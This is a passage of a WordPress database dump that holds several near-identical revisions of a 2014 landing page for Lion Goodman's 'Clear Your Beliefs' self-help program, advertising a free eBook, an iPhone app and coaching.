beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 01:08:02', '2014-10-24 06:08:02', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1616, 2, '2014-10-24 01:14:02', '2014-10-24 06:14:02', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em;margin-left: -10px;margin-bottom: -14px">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="font-size: 1.1em;margin-left: -10px;margin-bottom: 14px">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 01:14:02', '2014-10-24 06:14:02', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1617, 2, '2014-10-24 01:21:39', '2014-10-24 06:21:39', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em;margin-left: -10px;margin-bottom: -14px !important">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: -10px;margin-bottom: 14px !important">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />ANote from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt&lt;/em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 01:21:39', '2014-10-24 06:21:39', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1619, 2, '2014-10-24 01:34:43', '2014-10-24 06:34:43', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -14px !important;">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: -10px; margin-bottom: 14px !important;">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 01:34:43', '2014-10-24 06:34:43', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1618, 2, '2014-10-24 01:26:23', '2014-10-24 06:26:23', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -14px !important;">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: -10px; margin-bottom: 14px !important;">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important;margin-top: 5px ! important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt&lt;/em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 01:26:23', '2014-10-24 06:26:23', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1623, 2, '2014-10-24 01:52:18', '2014-10-24 06:52:18', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center;margin-top: 37px"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center;margin-bottom: -5px;margin-top: 37px"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em; margin-left: -10px; margin-bottom: -23px !important;">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: -10px; margin-bottom: 14px !important;">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I…\n- What belief…\n- How can I…\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 01:52:18', '2014-10-24 06:52:18', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1620, 2, '2014-10-24 01:35:46', '2014-10-24 06:35:46', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n<p style="font-size: 10px; text-align: center;">iClearIt is not yet available for Android or other platforms.</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg">\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 70px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n<p style="font-size: 1.1em;margin-left: -10px;margin-bottom: -23px !important">The <em>Clear Your Beliefs</em> Program… and  How and Why…</p>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<p style="margin-left: -10px;margin-bottom: 14px !important">How and Why It Works So Well</p>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, 